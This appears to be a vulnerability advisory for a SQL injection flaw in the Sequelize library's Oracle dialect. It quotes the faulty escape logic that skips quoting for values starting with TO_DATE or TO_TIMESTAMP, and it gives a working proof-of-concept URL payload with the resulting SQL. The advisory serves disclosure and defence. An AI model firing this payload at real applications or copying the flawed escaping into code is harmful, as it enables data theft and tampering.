SQL injection In sequelize
Description
Sequelize: SQL Injection (Oracle DB)
Summary
SQL Injection is possible with strings only if dialect is set to oracle.
The vulnerability was confirmed on Sequelize v6.37.3.
Details
The escape function defined in sql-string.js does not escape quotes if the value starts with TO_TIMESTAMP or TO_DATE.
} else if (dialect === 'oracle' && typeof val === 'string') { if (val.startsWith('TO_TIMESTAMP') || val.startsWith('TO_DATE')) { return val; } val = val.replace(/'/g, "''"); }
PoC
Suppose the application has the following code:
var result = await models.Student.findOne({ where: { firstName: req.query.firstName } });
An attacker can inject arbitrary sql expressions.
http://host/path?firstName=TO_DATE('0','Y')||'' OR 1=1--
The resulted SQL will be:
SELECT ... WHERE "Student"."firstName" = TO_DATE('0','Y')||'' OR 1=1-- ORDER BY "Student"."id" OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY;
Impact
Data theft and tampering.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Aliases
1. 2. 3. 4. 5.
References
1. 2. 3.